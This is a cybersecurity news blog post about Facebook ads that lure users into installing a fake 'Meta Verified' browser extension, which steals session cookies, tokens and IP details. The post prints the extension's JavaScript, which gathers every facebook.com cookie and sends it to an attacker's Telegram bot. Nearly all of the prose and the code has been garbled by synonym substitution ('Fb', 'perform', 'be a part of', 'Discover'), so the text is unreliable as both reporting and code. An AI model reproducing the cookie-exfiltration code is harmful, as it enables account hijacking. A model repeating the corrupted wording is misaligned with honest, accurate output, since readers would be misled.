Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Posted on September 10, 2025September 10, 2025 By CWS

Malicious actors have launched a classy malvertising marketing campaign on Fb that coerces unsuspecting customers into putting in a pretend “Meta Verified” browser extension.

Promoted by way of seemingly legit video tutorials, these advertisements promise to unlock the coveted blue verification tick with out paying Meta’s subscription price.

In actuality, the extension is engineered to reap delicate consumer knowledge, together with session cookies, entry tokens, and IP addresses.

By leveraging trusted platforms like Field.com for internet hosting, attackers guarantee excessive availability and evade easy URL-blocking defenses, making the rip-off seem each genuine and risk-free.

Upon nearer inspection, the video tutorials accompanying the advertisements bear the fingerprints of Vietnamese-speaking menace actors, with narration and code feedback written in Vietnamese.

The extension’s code, though clumsily obfuscated and certain generated by an AI-assisted toolkit, nonetheless successfully exfiltrates knowledge.

Bitdefender analysts recognized using the Fb Graph API to question Enterprise account data as soon as legitimate entry tokens are acquired, permitting attackers to differentiate high-value company profiles from private accounts.

Malicious browser extension advert (Supply – Bitdefender)

Victims who comply with the tutorial unwittingly grant the extension permissions to learn and export cookies from the fb.com area.

As soon as put in, the extension instantly invokes an exportCookies perform that compiles each cookie right into a formatted string earlier than transmitting it to a Telegram bot managed by the attackers.

Cookie export perform (Supply – Bitdefender)

To additional personalize the stolen knowledge, the malware queries to append geolocation particulars, bolstering its marketability on underground boards.

Bitdefender researchers famous that variants of this extension embody adjustable parameters for tick dimension and place, suggesting an automatic pipeline for producing new marketing campaign property with minimal guide effort.

The modular design additionally helps automated execution upon Chrome startup, guaranteeing persistent knowledge harvesting even when customers disable and re-enable the extension.

An infection Mechanism Deep Dive

The core of the an infection mechanism lies within the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens with out triggering consumer prompts.

After set up—triggered by clicking on an advert hyperlink—the extension makes use of chrome.cookies.getAll({ area: “fb.com” }, callback) to assemble cookies.

Inside the callback, it constructs the payload:-

async perform exportCookies() {
chrome.cookies.getAll({ area: “fb.com” }, async cookies => {
const cookieString = cookies. Map(c => `${c.identify}=${c.worth}`).be a part of(“;”);
const userId = cookies. Discover(c => c.identify === “c_user”)?.worth || “Unknown”;
const ipInfo = await fetch(”).then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}nIP: $ “Unknown”nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}

This streamlined method bypasses many endpoint-based detections, whereas using legit domains for internet hosting and command-and-control reduces the probability of speedy takedown.

Safety groups ought to monitor irregular cookie export exercise and implement rigorous extension vetting to defend in opposition to such industrialized malvertising threats.

Enhance your SOC and assist your staff defend what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Account, Ads, Beware, Details, Facebook, Malicious, Meta, Steals, User, Verified

Post navigation

Previous Post: Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military Systems
Next Post: AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

Related Posts

Crypto User Loses $9,000 in Seconds After Clicking Instagram Ad Promising Easy Profits Cyber Security News
Breachlock Named Sample Vendor for PTaaS and AEV in Two 2025 Gartner Reports Cyber Security News
Microsoft Confirms Error Entry in Windows Firewall With Advanced Security Cyber Security News
Androxgh0st Botnet Operators Exploiting US University For Hosting C2 Logger Cyber Security News
New Sophisticated Attack Bypasses Content Security Policy Using HTML-Injection Technique Cyber Security News
New Phising Attack Targeting Travellers from Hotel’s Compromised Booking.com Account Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Gladinet CentreStack Flaw Exploited to Hack Organizations
  • CyberVolk Hackers Group With New VolkLocker Payloads Attacks both Linux and Windows Systems
  • Recent GeoServer Vulnerability Exploited in Attacks
  • Microsoft Bug Bounty Program Expanded to Third-Party Code
  • New BlackForce Phishing Kit Lets Attackers Steal Credentials Using MitB Attacks and Bypass MFA

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Gladinet CentreStack Flaw Exploited to Hack Organizations
  • CyberVolk Hackers Group With New VolkLocker Payloads Attacks both Linux and Windows Systems
  • Recent GeoServer Vulnerability Exploited in Attacks
  • Microsoft Bug Bounty Program Expanded to Third-Party Code
  • New BlackForce Phishing Kit Lets Attackers Steal Credentials Using MitB Attacks and Bypass MFA

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark